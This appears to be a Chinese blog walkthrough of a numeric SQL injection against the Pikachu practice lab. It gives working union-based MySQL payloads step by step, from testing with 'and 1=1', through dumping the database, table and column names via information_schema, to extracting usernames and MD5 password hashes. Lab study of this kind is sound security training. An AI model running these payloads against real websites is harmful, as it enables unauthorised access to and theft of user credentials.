赞
踩
1、没有输入框,所以抓包修改
判断是否有注入:id=2 and 1=1页面返回正常
id=2 and 1=2 页面报错,存在注入
2、根据返回内容,可判断可能有两个注入点,通过order by语句判断是否正确
返回正常
报错,可以判断为两列
3、尝试union联合来确定注入点
id = 2 union select 99,98
4、开始爆数据库
id = 2 union select 99,database()
数据库名称:pikachu
5、根据pikachu,爆表名,union联合查询需要借助information_schema数据库,来查询当前数据库信息,information_schema是mysql自带的数据库
id=2 union select 99,table_name from information_schema.tables where table_schema = 'pikachu'
可以看到存在一个users表,猜测用户、密码放在里面
6、根据users表,爆列名
union select 99,column_name from information_schema.columns where table_name='users'
可以看出存在user、password列
7、最后一步,根据表,爆数据
union select username,password from users
密码是md5加密,通过在线解密就可以
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。